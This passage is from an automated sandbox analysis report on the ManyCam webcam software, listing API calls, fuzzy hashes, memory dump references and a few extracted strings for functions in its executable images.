                                                                                                                                            • Instruction ID: 9df2125c4ef5457798524062e3a11b60d2f3a7f222f2b8b9a439bf1f8e3d57c1
                                                                                                                                            • Opcode Fuzzy Hash: 164d6ffe732d9fa8baa0de175643794e8cd3c3d995353351aea268910f753e13
                                                                                                                                            • Instruction Fuzzy Hash: 0DF03CB1944648EBCB14DFA4ED45B9DBB78FB14720F50426AB812A32D0DB756A08CB54
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ??2@??3@_setjmp3fclosefopen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1448151454-0
                                                                                                                                            • Opcode ID: 291fe1d9f172636f3e291bf8b6812345e5dcda22a56255e5b6fa00555a86c8bc
                                                                                                                                            • Instruction ID: d06e7f98f4fce1b563f259670deb6dac49d5ca5a697b9d842b0c1adfd2f27970
                                                                                                                                            • Opcode Fuzzy Hash: 291fe1d9f172636f3e291bf8b6812345e5dcda22a56255e5b6fa00555a86c8bc
                                                                                                                                            • Instruction Fuzzy Hash: AE5139B1D002689BDF34DF24CC81BDEB7B8AB14704F1445EAE919A7241EA719AC4CF91
                                                                                                                                            APIs
                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,00000000,00000000,00000000), ref: 00B95149
                                                                                                                                              • Part of subcall function 00B94F90: GdiFlush.GDI32(00B95056,?,?,00000000,00000000,00000000), ref: 00B94F93
                                                                                                                                              • Part of subcall function 00B94F90: GetCurrentObject.GDI32(?,00000007), ref: 00B94FA3
                                                                                                                                              • Part of subcall function 00B94F00: GetClientRect.USER32(?,00000000), ref: 00B94F0F
                                                                                                                                              • Part of subcall function 00B94F00: GetWindowRect.USER32(?,?), ref: 00B94F22
                                                                                                                                              • Part of subcall function 00B94F00: SubtractRect.USER32(?,?,?), ref: 00B94F41
                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,00000000), ref: 00B950B0
                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00B950BB
                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00B950CA
                                                                                                                                            • MoveWindow.USER32(?,?,?,00000001,00000001,00000001,?,?,?,?,00000000,00000000), ref: 00B95106
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: RectWindow$Move$Client$CurrentFlushObjectSubtract
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1830049877-0
                                                                                                                                            • Opcode ID: 47e49916515b5b45f3a5eed3e55e8203f3d94b25e291275b671f28226cd7c067
                                                                                                                                            • Instruction ID: c7e261da9445f927d84646201548ba3b1631921ca65e40c5186dfadc23442445
                                                                                                                                            • Opcode Fuzzy Hash: 47e49916515b5b45f3a5eed3e55e8203f3d94b25e291275b671f28226cd7c067
                                                                                                                                            • Instruction Fuzzy Hash: 50416C71614201AFCB04DF68DD85EABBBE9FFC8314F048A6DF989A3214D634E945CB91
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: strchr$tolower
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1960513771-0
                                                                                                                                            • Opcode ID: 78d6ed3ac16ddc681d6d304668006f0464c0f222f9c586bfa0624076d78cdd1e
                                                                                                                                            • Instruction ID: 4bca845c4c878a1a561266e20a3a86b4ae2f956c531e1195ae80e54aa7a9dc9a
                                                                                                                                            • Opcode Fuzzy Hash: 78d6ed3ac16ddc681d6d304668006f0464c0f222f9c586bfa0624076d78cdd1e
                                                                                                                                            • Instruction Fuzzy Hash: E3313A7254431657CF20DFA4AC8076AB7D5EF9A311F08047AEE44E7211FE72D94A87A1
                                                                                                                                            APIs
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 00506F28
                                                                                                                                              • Part of subcall function 0040EA00: _DebugHeapAllocator.LIBCPMTD ref: 0040EA0E
                                                                                                                                            • ??2@YAPAXI@Z.MSVCR80(00000004,00565168,7EC02BB4,?,?,?,?,?,?,?,?,?,?,00539108,000000FF), ref: 00506F2F
                                                                                                                                            • codecvt.LIBCPMTD ref: 00506F9F
                                                                                                                                            • wcstol.MSVCR80 ref: 00506FEE
                                                                                                                                            • codecvt.LIBCPMTD ref: 00507011
                                                                                                                                              • Part of subcall function 00415BF0: ??3@YAXPAX@Z.MSVCR80(?,?,?,00415B3D,00000000,?,00415660,?,00000000,?,00415162,?,?,004141EC,00000000,?), ref: 00415C0B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocatorDebugHeapcodecvt$??2@??3@wcstol
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 74129304-0
                                                                                                                                            • Opcode ID: f820b669af4b91f01ff1afac2cb9a1d8ae762e6116985bebba3912421fffcbed
                                                                                                                                            • Instruction ID: 6d66b3f1b8e0294eece4e25a7ed8cbe839a85e6d975fee0ec5976f71f30e8fe7
                                                                                                                                            • Opcode Fuzzy Hash: f820b669af4b91f01ff1afac2cb9a1d8ae762e6116985bebba3912421fffcbed
                                                                                                                                            • Instruction Fuzzy Hash: 7E4103B0D05209EFDB14DF94D895BEEBBB0BB48314F20852AE416AB2C0DB756A45CF94
                                                                                                                                            APIs
                                                                                                                                            • lstrlenW.KERNEL32(00000000,00569E8C), ref: 0046C121
                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,00000000,00000000,00000000,00000080,00000000,0000007C,00000080), ref: 0046C16B
                                                                                                                                            • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000080,00000000,0000007C,00000080), ref: 0046C17D
                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000080,00000000,0000007C,00000080), ref: 0046C19E
                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,00000000,00000000,00000000,00000080,00000000,0000007C,00000080,?,00000000,00000000,00000000), ref: 0046C1DC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3322701435-0
                                                                                                                                            • Opcode ID: cbcd1fa559f8ae4230e768bd00e513c0907913d8661ee28b925d20b683ff2109
                                                                                                                                            • Instruction ID: c9f41260a9b7f310c3a2772d0b559dbbeee8ca943a5465fee336bfd2e85e9abf
                                                                                                                                            • Opcode Fuzzy Hash: cbcd1fa559f8ae4230e768bd00e513c0907913d8661ee28b925d20b683ff2109
                                                                                                                                            • Instruction Fuzzy Hash: E3310DB5A40208BFEB04DF94CC96FAF77B9FB48704F108549F615EB280D675A940DB94
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: isdigit$isspace
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4135990190-0
                                                                                                                                            • Opcode ID: 24aa94b61cd639e26a12a2348c5e1db151e3ef1f3f9f5e054ac515bace35fe26
                                                                                                                                            • Instruction ID: e7d34af844dbeb03295b41f834af5328b631e20ac2c5b5b20a05bea2e1f0d1c8
                                                                                                                                            • Opcode Fuzzy Hash: 24aa94b61cd639e26a12a2348c5e1db151e3ef1f3f9f5e054ac515bace35fe26
                                                                                                                                            • Instruction Fuzzy Hash: 50118031B112194BEE216B256CD567F73E9DE41398F0804B5EC42D7252FF09EE1A82EB
                                                                                                                                            APIs
                                                                                                                                            • FindResourceW.KERNEL32(00000000,0047AE1E,00000006,?,0047AE1E), ref: 00488A3B
                                                                                                                                            • GetLastError.KERNEL32(?,0047AE1E), ref: 00488A4A
                                                                                                                                            • SizeofResource.KERNEL32(00000000,00000000,?,0047AE1E), ref: 00488A5A
                                                                                                                                            • GetLastError.KERNEL32(?,0047AE1E), ref: 00488A67
                                                                                                                                            • GetLastError.KERNEL32(000000FF,00000000,00000000,00000000,00000000,00000000,?,0047AE1E), ref: 00488AA8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$Resource$FindSizeof
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1187693681-0
                                                                                                                                            • Opcode ID: 65827e7e1ba533ac49771d736c66928104eedf98d9c70884fcfb5a62a0082481
                                                                                                                                            • Instruction ID: c0cef2afab0bd7fe4f68a4e2e270c34d254ae90ade39b42375e279ad05fcd0b3
                                                                                                                                            • Opcode Fuzzy Hash: 65827e7e1ba533ac49771d736c66928104eedf98d9c70884fcfb5a62a0082481
                                                                                                                                            • Instruction Fuzzy Hash: 13215EB490410CAFDF04EFA8C894AAEBBB5AF58304F50855EF516E7380DB349A40DBA5
                                                                                                                                            APIs
                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,004BA32E,00000000,?,?,004B95C5,00000000,00000000,?,000000FF,?,00000000,?,?), ref: 00520C38
                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,004BA32E,00000000,?,?,004B95C5,00000000,00000000,?,000000FF,?,00000000,?,?), ref: 00520C45
                                                                                                                                            • SetEvent.KERNEL32(0000000A,?,?,004BA32E,00000000,?,?,004B95C5,00000000,00000000,?,000000FF,?,00000000,?,?), ref: 00520C60
                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,004BA32E,00000000,?,?,004B95C5,00000000,00000000,?,000000FF,?,00000000,?), ref: 00520C6C
                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,004BA32E,00000000,?,?,004B95C5,00000000,00000000,?,000000FF,?,00000000,?,?), ref: 00520C76
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CriticalSection$Leave$EnterEventObjectSingleWait
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2480823239-0
                                                                                                                                            • Opcode ID: 69de553fff6750679b5045ee798069faca8b5646966b91e150a6d47a83d5acfd
                                                                                                                                            • Instruction ID: 20fc61db396638aa89e1fa09a044bcff496ff3b65396fda0f4d22a802af35d76
                                                                                                                                            • Opcode Fuzzy Hash: 69de553fff6750679b5045ee798069faca8b5646966b91e150a6d47a83d5acfd
                                                                                                                                            • Instruction Fuzzy Hash: 12F05E761002109BD320DB19EC4899BF7B8EFE5731B008A1EF66693760C774A84ADB50
                                                                                                                                            APIs
                                                                                                                                            • AVIStreamRelease.AVIFIL32(?,00B91845), ref: 00B917EC
                                                                                                                                            • AVIStreamRelease.AVIFIL32(?,00B91845), ref: 00B917F9
                                                                                                                                            • AVIStreamRelease.AVIFIL32(?,00B91845), ref: 00B91805
                                                                                                                                            • cvReleaseImage.CXCORE099(?,00B91845), ref: 00B9180E
                                                                                                                                            • memset.MSVCR80 ref: 00B91818
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Release$Stream$Imagememset
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1141295433-0
                                                                                                                                            • Opcode ID: 9b10a1fac828d35d3803fb3ec6bc7492a8297132dec4526e2ec142395d89f5c7
                                                                                                                                            • Instruction ID: 4e60a1899113ff0d44801672d998536aa7dc509e59040c86a8a8ee8b4f2a8340
                                                                                                                                            • Opcode Fuzzy Hash: 9b10a1fac828d35d3803fb3ec6bc7492a8297132dec4526e2ec142395d89f5c7
                                                                                                                                            • Instruction Fuzzy Hash: 0EE01260A0061362DE30B6788891F27A2DC9F00B40F550CA97585E6251EF28E9005254
                                                                                                                                            APIs
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 0042C9E5
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 0042C9F7
                                                                                                                                              • Part of subcall function 0042F960: _invalid_parameter_noinfo.MSVCR80(-0000003E,?,004AB3E0,00000000,0000000A,00000001,7EC02BB4,000000FF,?,004AB79D), ref: 0042F974
                                                                                                                                              • Part of subcall function 0042E150: _DebugHeapAllocator.LIBCPMTD ref: 0042E198
                                                                                                                                              • Part of subcall function 0042E150: _DebugHeapAllocator.LIBCPMTD ref: 0042E1D1
                                                                                                                                              • Part of subcall function 0042E150: _DebugHeapAllocator.LIBCPMTD ref: 0042E203
                                                                                                                                              • Part of subcall function 0042E150: _DebugHeapAllocator.LIBCPMTD ref: 0042E23C
                                                                                                                                              • Part of subcall function 0042E150: _DebugHeapAllocator.LIBCPMTD ref: 0042E258
                                                                                                                                              • Part of subcall function 0042E150: GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000400), ref: 0042E295
                                                                                                                                              • Part of subcall function 0042E150: _DebugHeapAllocator.LIBCPMTD ref: 0042E2A5
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocatorDebugHeap$DateFormat_invalid_parameter_noinfo
                                                                                                                                            • String ID: www.manycam.com$www.manycam.com
                                                                                                                                            • API String ID: 553431348-1145362033
                                                                                                                                            • Opcode ID: 907b669c7419f88507c8a825532ba4f2d68d0285e46d80b14031e18f66ef58df
                                                                                                                                            • Instruction ID: 55a663fd7b0127f2866d6ce172646f00f7e0cf50757378cb7dafc49b07509b25
                                                                                                                                            • Opcode Fuzzy Hash: 907b669c7419f88507c8a825532ba4f2d68d0285e46d80b14031e18f66ef58df
                                                                                                                                            • Instruction Fuzzy Hash: 47414271A001199BCB08DB99E891BEEB7B5FF48318F54412EE212B7391DB385944CBA9
                                                                                                                                            APIs
                                                                                                                                            • SendMessageW.USER32(00000000,?,0000004E,00000000), ref: 004181E3
                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111), ref: 00418234
                                                                                                                                              • Part of subcall function 004182A0: GetDlgCtrlID.USER32(?), ref: 004182AD
                                                                                                                                              • Part of subcall function 004065F0: GetParent.USER32(?), ref: 004065FD
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend$CtrlParent
                                                                                                                                            • String ID: open
                                                                                                                                            • API String ID: 1383977212-2758837156
                                                                                                                                            • Opcode ID: 01cc08d3ab3f4a93a3031a1c368f21ad3e1f66622c4ad21caec5fa85ffc382d2
                                                                                                                                            • Instruction ID: c0f4561a2c49f87f87505e6ad243b5dafbf5b9024aec12e38c733bc4d86155cd
                                                                                                                                            • Opcode Fuzzy Hash: 01cc08d3ab3f4a93a3031a1c368f21ad3e1f66622c4ad21caec5fa85ffc382d2
                                                                                                                                            • Instruction Fuzzy Hash: FD313E70A042599FEF08DBA5DC51BFEBBB5BF48304F14415DE506B73C2CA38A9418B69
                                                                                                                                            APIs
                                                                                                                                            • memcpy.MSVCR80(?,?,?,75BF3EB0,?,?,00B95D3F,?), ref: 00B955D3
                                                                                                                                            • sprintf.MSVCR80 ref: 00B955FD
                                                                                                                                            • SetWindowTextA.USER32(?,?), ref: 00B9560F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: TextWindowmemcpysprintf
                                                                                                                                            • String ID: %s: %d
                                                                                                                                            • API String ID: 457325812-423524997
                                                                                                                                            • Opcode ID: 1dc2849f7f1626032afb6999546c4c1ab861cf61429b70623d9d30a6caf0e3ef
                                                                                                                                            • Instruction ID: 5d2d9598dacc4338e5b5b2b8b6803877c57b341679dd6eaa7ad1a8cbba9f3822
                                                                                                                                            • Opcode Fuzzy Hash: 1dc2849f7f1626032afb6999546c4c1ab861cf61429b70623d9d30a6caf0e3ef
                                                                                                                                            • Instruction Fuzzy Hash: 33219175108740AFC721CF25D88196BBBF9EF98704B04C9ADE8C987312E735E945DB52
                                                                                                                                            APIs
                                                                                                                                            • CreateFileA.KERNEL32(?,-80000000,00000001,00000000,00000002,00000001,00000000), ref: 00BCC707
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00BCC73F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
